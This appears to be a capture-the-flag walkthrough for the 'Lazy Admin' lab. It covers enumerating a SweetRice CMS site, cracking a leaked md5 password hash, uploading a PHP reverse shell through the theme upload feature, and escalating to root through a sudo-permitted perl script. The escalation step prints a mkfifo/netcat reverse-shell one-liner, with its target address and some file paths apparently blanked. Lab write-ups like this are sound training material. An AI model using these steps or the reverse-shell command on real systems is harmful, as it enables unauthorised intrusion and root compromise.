Lazy Admin

HTTP Enumeration - SweetRice CMS - Perl binary Abuse

Initial enumeration

  • Only two ports were open - 22 and 80

  • Enumerating port 80 gives us an endpoint /content - It automatically appends a slash in front of it, which means we'll have to enumerate even for more endpoints

  • Enumerating more gives us /content/as - a login page

  • Enumerating the /content/inc - leaks the sensitive information and the interesting one was the mysql_database_backup.sql

  • It was basically a text file which had few usernames and a md5 hash

  • Decrypting that md5 hash - Password123


  • Exploring SweetRice CMS gave us an upload functionality under theme section - which can be later accessed by the /_themes directory

  • Upload a php reverse shell and trigger it, using the themes endpoint - get a shell

Privilege Escalation

  • Executing the sudo lists command using sudo -l gave us

(ALL) NOPASSWD: /usr/bin/perl /home/itguy/
  • So the above phrase means - that the perl binary is running as root and it is only allowed to exec the file as a root user, so now how do we abuse it? in order to get a root shell?

  • Let's cat out the /home/itguy/ file

  • Why don't we just modify the /etc/ file into our reverse shell ?

$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 1234 >/tmp/f' > /etc/
  • Grab the root.txt :)

Last updated